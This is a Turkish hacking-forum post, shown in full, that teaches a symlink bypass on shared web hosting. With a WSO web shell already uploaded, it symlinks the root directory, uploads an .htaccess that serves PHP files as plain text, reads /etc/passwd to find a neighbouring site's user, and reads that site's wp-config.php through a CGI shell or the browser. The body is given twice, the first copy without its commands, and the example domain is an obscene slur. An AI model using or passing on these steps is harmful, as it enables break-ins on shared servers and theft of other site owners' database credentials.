A
Anarchosa
Beyler bu method her sw'de işe yaramaz ama yinede paylaşmak istedim.
C1'e Benziyor ama değil.
İlk olarak sitemize wso shell upload edip, herhangi bir dizinde yeni bir klasör açıyoruz.
Örneğin ben
Yani Temalar klasörünün içinde Anarchosa adında bir klasör oluşturdum varsayın. Ben manuel oluşturdum siz kısayoldan oluşturabilirsiniz.
Şimdi klasörün içine girelim.
Execute yani console kısmından şu komutu yazın.
Tamamdır kök dizinini Anarchosa klasörünün içine çekmiş olduk.
Şimdi vereceğim .htaccess dosyasını Anarchosa klasörüne upload edip, url üzerinde txt dosyalarını görüntüleme yetkisi alıyoruz.
.htaccess
Şimdi yapmamız gereken /var/named veya siteler nerde bulunuyorsa vhosts vs. Oraya girin ve kendinize hedef bir site seçin.. Diyelim sitemizin ismi orospucocu.com.. Hedefimizi belirledik.
Şimdi sitenin useri, yani hosttaki kullanıcı adını öğrenmeliyiz. Bunun için en iyi yöntem
ile userleri çekin ve pc tuşları ile ctrl + f tuşuna basın.
Arama metni çıkıcak. Oraya orospucocu.com yazarsanız sitenin kullanıcı adını yüksek ihtimalle bulursunuz. Bizim kullanıcı adımız alperseyyar çıktı.
Tamamdır şimdi burda yapmanız gereken sitenin hangi script ile yapıldığını öğrenmek.
Biz araştırdık ve orospucocu.com'un wordpress bir site olduğunu öğrendik.
Şimdi wso shellde change dir kısmına
yazıyoruz yüksek ihtimalle hata alıcaksınız. Şimdi
yazın.
Ve orospucocu.php'nin içine erişim sağlamış olacaksınız. Tabi her zaman bu yöntem işe yaramıyor hatta genellikle işe yaramıyor sebebi ise cgi telnet kullanmadığımızdan kaynaklanıyor.
Şimdi birtane cgi shell upload edelim.
Ve cgiye geçiş yapalım.
Şimdi cgi komut satırımıza;
Yazıp, kök dizine gidelim.
Şimdi ise;
yazdıktan sonra yüksek ihtimlle erişim sağlarsınız. Şimdi ise;
Yazıp ana dizine erişim sağlayın.
Nasıl olsa wordpress.
ana dizine erişim sağladınız diyelim şimdi sırada;
yazarak config bilgilerini okuyabilirsiniz. Eğer cat işe yaramazsa ki çok düşük ihtimal..
ln -s komutu ile confiği txt dosyasına çevirip o şekilde okuyabilirsiniz.
Diyelim sw cgi shelldeki komutlarda da hata veriyor.
İlk baştan beri merak ediyor olabilirsiniz neden htaccess dosyası oluşturduğumuzu. İşte bize şuan lazım olucak.
Anarchosa klasörümüzün içerisinde root adında bir kök dizin ve .htaccess dosyamız vardı öyle değil mi ?
Şimdi urlnin sonuna şöyle yapın;
Yazdığınız zaman karşınıza dizinler gelecek..
Bundan sonra yapmanız gereken kolay hedef sitemiz orospucocu.com'un kullanıcı adı neydi alperseyyar dı
Urlnin sonuna şöyle yazın;
Ve karşınıza dosyalar çıkacak... Bundan sonra bypass etme şekliniz size bağlı benden bu kadar dilerseniz konsol üzerinde html olarak açın config dosyasını dilerseniz de txt ile açmaya çalışın perm yerseniz sağlık olsun.
O swyi bu methodla geçemeyeceksiniz demektir.
C1'e Benziyor ama değil.
İlk olarak sitemize wso shell upload edip, herhangi bir dizinde yeni bir klasör açıyoruz.
Örneğin ben
Code:
mkdir /home/user/public_html/wp-content/themes/ Anarchosa
Yani Temalar klasörünün içinde Anarchosa adında bir klasör oluşturdum varsayın. Ben manuel oluşturdum siz kısayoldan oluşturabilirsiniz.
Şimdi klasörün içine girelim.
Execute yani console kısmından şu komutu yazın.
Code:
ln -s / root
Şimdi vereceğim .htaccess dosyasını Anarchosa klasörüne upload edip, url üzerinde txt dosyalarını görüntüleme yetkisi alıyoruz.
.htaccess
Code:
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
Şimdi yapmamız gereken /var/named veya siteler nerde bulunuyorsa vhosts vs. Oraya girin ve kendinize hedef bir site seçin.. Diyelim sitemizin ismi orospucocu.com.. Hedefimizi belirledik.
Şimdi sitenin useri, yani hosttaki kullanıcı adını öğrenmeliyiz. Bunun için en iyi yöntem
Code:
cat /etc/passwd
Arama metni çıkıcak. Oraya orospucocu.com yazarsanız sitenin kullanıcı adını yüksek ihtimalle bulursunuz. Bizim kullanıcı adımız alperseyyar çıktı.
Tamamdır şimdi burda yapmanız gereken sitenin hangi script ile yapıldığını öğrenmek.
Biz araştırdık ve orospucocu.com'un wordpress bir site olduğunu öğrendik.
Şimdi wso shellde change dir kısmına
Code:
/home/alperseyyar/
Code:
/home/alperseyyar/public_html
Ve orospucocu.php'nin içine erişim sağlamış olacaksınız. Tabi her zaman bu yöntem işe yaramıyor hatta genellikle işe yaramıyor sebebi ise cgi telnet kullanmadığımızdan kaynaklanıyor.
Şimdi birtane cgi shell upload edelim.
Ve cgiye geçiş yapalım.
Şimdi cgi komut satırımıza;
Code:
cd /
Şimdi ise;
Code:
cd /home/alperseyyar/
yazdıktan sonra yüksek ihtimlle erişim sağlarsınız. Şimdi ise;
Code:
cd public_html veya cd www
Nasıl olsa wordpress.
ana dizine erişim sağladınız diyelim şimdi sırada;
Code:
cat wp-config.php
ln -s komutu ile confiği txt dosyasına çevirip o şekilde okuyabilirsiniz.
Diyelim sw cgi shelldeki komutlarda da hata veriyor.
İlk baştan beri merak ediyor olabilirsiniz neden htaccess dosyası oluşturduğumuzu. İşte bize şuan lazım olucak.
Anarchosa klasörümüzün içerisinde root adında bir kök dizin ve .htaccess dosyamız vardı öyle değil mi ?
Şimdi urlnin sonuna şöyle yapın;
Code:
bulundugumuzsite/wp-content/Anarchosa/root/
Yazdığınız zaman karşınıza dizinler gelecek..
Bundan sonra yapmanız gereken kolay hedef sitemiz orospucocu.com'un kullanıcı adı neydi alperseyyar dı
Urlnin sonuna şöyle yazın;
Code:
bulundugumuzsite.com/Wp-content/themes/Anarchosa/root/home/alperseyyar/public_html/
Ve karşınıza dosyalar çıkacak... Bundan sonra bypass etme şekliniz size bağlı benden bu kadar dilerseniz konsol üzerinde html olarak açın config dosyasını dilerseniz de txt ile açmaya çalışın perm yerseniz sağlık olsun.
O swyi bu methodla geçemeyeceksiniz demektir.
Last edited by a moderator: